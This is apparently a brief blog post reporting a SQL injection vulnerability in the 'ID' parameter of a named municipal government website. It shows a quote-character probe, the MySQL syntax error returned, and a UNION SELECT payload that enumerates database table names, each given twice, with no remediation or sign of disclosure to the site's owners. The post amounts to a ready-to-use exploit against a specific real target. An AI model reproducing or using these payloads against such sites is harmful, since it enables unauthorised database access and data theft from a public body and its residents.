Sql Injection (id)
http://www.murrayky.gov/showevent.htm?ID='
-error-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---
http://www.murrayky.gov/showevent.htm?ID=123+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.tables--
http://www.murrayky.gov/showevent.htm?ID='
-error-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---
http://www.murrayky.gov/showevent.htm?ID=123+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.tables--
Comments
Post a Comment